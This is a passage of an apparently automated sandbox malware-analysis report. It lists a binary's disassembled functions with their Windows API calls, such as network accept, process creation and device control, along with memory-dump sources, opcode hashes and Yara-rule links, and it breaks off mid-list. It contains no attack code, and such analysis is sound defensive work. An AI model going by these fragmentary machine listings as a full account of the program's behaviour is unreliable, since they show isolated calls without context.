                                                                                                                                        • Instruction Fuzzy Hash: CB117F31315154AFDB54AB24CC49FAA7BE9EF89320F14811DF816CB2E2CB78AC00CB95
                                                                                                                                        Function 007B900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007B906D
                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007B907F
                                                                                                                                        • accept.WS2_32(00000000,00000000,00000000), ref: 007B908C
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B90A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 385091864-0
                                                                                                                                        • Opcode ID: c428d76792fe84a593726f09ef6d8ad601f0d978139cb6aa3bd1365200381883
                                                                                                                                        • Instruction ID: 8be491aeddab8b7fc289687d6ae7292f702af0b869524e42ec4512e14fde247d
                                                                                                                                        • Opcode Fuzzy Hash: c428d76792fe84a593726f09ef6d8ad601f0d978139cb6aa3bd1365200381883
                                                                                                                                        • Instruction Fuzzy Hash: BE215471A011249FCB20DF69CC85ADABBFCEF49750F00816AF959D7291DB789E41CBA0
                                                                                                                                        Function 007A18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007A18FD,?,?,?,007A26BC,00000000,000000EF,00000119,?,?), ref: 007A2CB9
                                                                                                                                          • Part of subcall function 007A2CAA: lstrcpyW.KERNEL32(00000000,?,?,007A18FD,?,?,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A2CDF
                                                                                                                                          • Part of subcall function 007A2CAA: lstrcmpiW.KERNEL32(00000000,?,007A18FD,?,?,?,007A26BC,00000000,000000EF,00000119,?,?), ref: 007A2D10
                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A1916
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A193C
                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A1970
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                        • String ID: cdecl
                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                        • Opcode ID: b5988cc897e73ed1cbb0502212f3bd72960dc39170a4050b8a5762f6099d2fc0
                                                                                                                                        • Instruction ID: 6a143a46ce2f7ead8b8a564790f3a9c1fa43d06f50494f6b9d08a36a6b434894
                                                                                                                                        • Opcode Fuzzy Hash: b5988cc897e73ed1cbb0502212f3bd72960dc39170a4050b8a5762f6099d2fc0
                                                                                                                                        • Instruction Fuzzy Hash: 0F11D636100345EFDB15AF34C859D7A77B9FF8A350F80852AF806CB260EB35A841C7A1
                                                                                                                                        Function 00793D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00793D65
                                                                                                                                          • Part of subcall function 007845EC: __FF_MSGBANNER.LIBCMT ref: 00784603
                                                                                                                                          • Part of subcall function 007845EC: __NMSG_WRITE.LIBCMT ref: 0078460A
                                                                                                                                          • Part of subcall function 007845EC: RtlAllocateHeap.NTDLL(01170000,00000000,00000001), ref: 0078462F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                        • Opcode ID: 35feb195390eb7d92026e53e75094bf89da9af66a895f9ad01f455c55cbaabf6
                                                                                                                                        • Instruction ID: ab1307a13e3d7bba04db162a001be089a97071271231817bf117af4f41910a21
                                                                                                                                        • Opcode Fuzzy Hash: 35feb195390eb7d92026e53e75094bf89da9af66a895f9ad01f455c55cbaabf6
                                                                                                                                        • Instruction Fuzzy Hash: 08110632A45611EBDF313F70BC586AA3B98BF04361F508525F909DA292DF3C8E408751
                                                                                                                                        Function 007A713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007A715C
                                                                                                                                        • _memset.LIBCMT ref: 007A717D
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007A71CF
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007A71D8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1157408455-0
                                                                                                                                        • Opcode ID: 1a40e23e120d5b99114f01d0a1e9b0f712ba5d9372fe438f4e097761ee5a0d4e
                                                                                                                                        • Instruction ID: b6de81a9830d0da77ddf278591cbcba3c88bf6f5ef309c9b822aac557de4701b
                                                                                                                                        • Opcode Fuzzy Hash: 1a40e23e120d5b99114f01d0a1e9b0f712ba5d9372fe438f4e097761ee5a0d4e
                                                                                                                                        • Instruction Fuzzy Hash: 1011CD7190122C7AD7305B65AC4DFEBBABCEF45760F104299F504E71D0D2744E80CB68
                                                                                                                                        Function 007A13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007A13EE
                                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007A1409
                                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007A141F
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 007A1474
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3137044355-0
                                                                                                                                        • Opcode ID: 3ec6a456c84d9e115e212dd68ee633e026c9bbbf460737090d0d11feb047b4bf
                                                                                                                                        • Instruction ID: c33133ad019dfc0b1ff4f78bacba5954c6066544c5ab562e35489c57634d22cd
                                                                                                                                        • Opcode Fuzzy Hash: 3ec6a456c84d9e115e212dd68ee633e026c9bbbf460737090d0d11feb047b4bf
                                                                                                                                        • Instruction Fuzzy Hash: 2C21D371500349EFEB20DF94DC88ADABBBCEF49744F80866DA5229B410D778EA04DF51
                                                                                                                                        Function 0079C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0079C285
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079C297
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079C2AD
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079C2C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 6d1924acf183da33e85203f1ce37e5a8dfe40da8c5b0ef56d38719ced645a9f1
                                                                                                                                        • Instruction ID: 5f5009971978fecd8b46afbf92d9733f118ddf01187e837e6608785313eb1f39
                                                                                                                                        • Opcode Fuzzy Hash: 6d1924acf183da33e85203f1ce37e5a8dfe40da8c5b0ef56d38719ced645a9f1
                                                                                                                                        • Instruction Fuzzy Hash: 1611187A940218FFDF11DBD8D885E9DBBB4FB08750F204091EA04B7294D671AE10DB94
                                                                                                                                        Function 007A7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 007A7C6C
                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 007A7C9F
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007A7CB5
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007A7CBC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                        • Opcode ID: f72fe8f5372f04b9f8d4698aa30b2ba15e4606b1455e0211650519127f0437b9
                                                                                                                                        • Instruction ID: dab585e5816961efc6d0ade14146236feb3c25fe081b786f027e2a70eb1fcefa
                                                                                                                                        • Opcode Fuzzy Hash: f72fe8f5372f04b9f8d4698aa30b2ba15e4606b1455e0211650519127f0437b9
                                                                                                                                        • Instruction Fuzzy Hash: D1116B72A05248BFC721AFACDC48A9A7FADAF49320F008395F424D3251D6788D04C778
                                                                                                                                        Function 0077C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                        • Opcode ID: b085258ad5b77a2646d7e3eda3ff4c8ef8dbb643bf8bd3ad888470f3fa16a770
                                                                                                                                        • Instruction ID: eacae0f23d7f7fcadee9fd4a1c9102786b873c158248869100eee7e5dc259dee
                                                                                                                                        • Opcode Fuzzy Hash: b085258ad5b77a2646d7e3eda3ff4c8ef8dbb643bf8bd3ad888470f3fa16a770
                                                                                                                                        • Instruction Fuzzy Hash: A9118472501559BFDF124FA09CC5EEA7B69FF0D394F058119FA1896110C73ADC60DBA4
                                                                                                                                        Function 007A49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 007A49EE
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 007A4A13
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 007A4A1D
                                                                                                                                        • Sleep.KERNEL32(?), ref: 007A4A50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                        • Opcode ID: 588dcb7f6cb1cddf232ae68815422ffe12e3cf27e7e94435c2a780ab6acbf51d
                                                                                                                                        • Instruction ID: 8e8933f2dc4c27858de010e750bfaf9af7f58df1d07d6d339bf938aa16b84f67
                                                                                                                                        • Opcode Fuzzy Hash: 588dcb7f6cb1cddf232ae68815422ffe12e3cf27e7e94435c2a780ab6acbf51d
                                                                                                                                        • Instruction Fuzzy Hash: 3C11AC30D4051CDBCF00EFE4D988AEEBB38FF8A310F018145E941B6140CB799960CB99
                                                                                                                                        Function 00795BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                        • Instruction ID: 1bdb4c43d3d2482066fed0aa5faa5ecd30643ebc95ef3e1f8b83ad408814dccf
                                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                        • Instruction Fuzzy Hash: 3D014C7200065EFBCF135F88EC46CEE3F62BB19350B588915FE1859031D23ACAB1AB91
                                                                                                                                        Function 007880E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078869D: __getptd_noexit.LIBCMT ref: 0078869E
                                                                                                                                        • __lock.LIBCMT ref: 0078811F
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 0078813C
                                                                                                                                        • _free.LIBCMT ref: 0078814F
                                                                                                                                        • InterlockedIncrement.KERNEL32(011965A0), ref: 00788167
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2704283638-0
                                                                                                                                        • Opcode ID: ed229eb041f4bbf2df6ec0bc28ffead6d76f7b2d1fdb2a69029b446d88b5bf54
                                                                                                                                        • Instruction ID: c4a7705fd67621152c19c86496201417738be7fd91f14d89bf9d036954321d3a
                                                                                                                                        • Opcode Fuzzy Hash: ed229eb041f4bbf2df6ec0bc28ffead6d76f7b2d1fdb2a69029b446d88b5bf54
                                                                                                                                        • Instruction Fuzzy Hash: 6C016D31D82A15DBCBA5BB64980E7A9B364BF04720F944119F824A7392DF2C6C42CBD3
                                                                                                                                        Function 00788724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 00788768
                                                                                                                                          • Part of subcall function 00788984: __mtinitlocknum.LIBCMT ref: 00788996
                                                                                                                                          • Part of subcall function 00788984: RtlEnterCriticalSection.NTDLL(00780127), ref: 007889AF
                                                                                                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00788775
                                                                                                                                        • __lock.LIBCMT ref: 00788789
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 007887A7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1687444384-0
                                                                                                                                        • Opcode ID: 989c5a7f8004b833a02e2a739aff73f1b93be9199ec7e63ca0c85a952bbbf20b
                                                                                                                                        • Instruction ID: b379f73058cd88bc56795d8f2d5af8614be8b0f81c48ef98cbc1f051b533cd31
                                                                                                                                        • Opcode Fuzzy Hash: 989c5a7f8004b833a02e2a739aff73f1b93be9199ec7e63ca0c85a952bbbf20b
                                                                                                                                        • Instruction Fuzzy Hash: C9016DB1481B00DFD760EFB5C809759B7F4FF54325F20890EE0AA972A0DB78A644CB02
                                                                                                                                        Function 007CE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007CE14D
                                                                                                                                        • _memset.LIBCMT ref: 007CE15C
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00823EE0,00823F24), ref: 007CE18B
                                                                                                                                        • CloseHandle.KERNEL32 ref: 007CE19D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
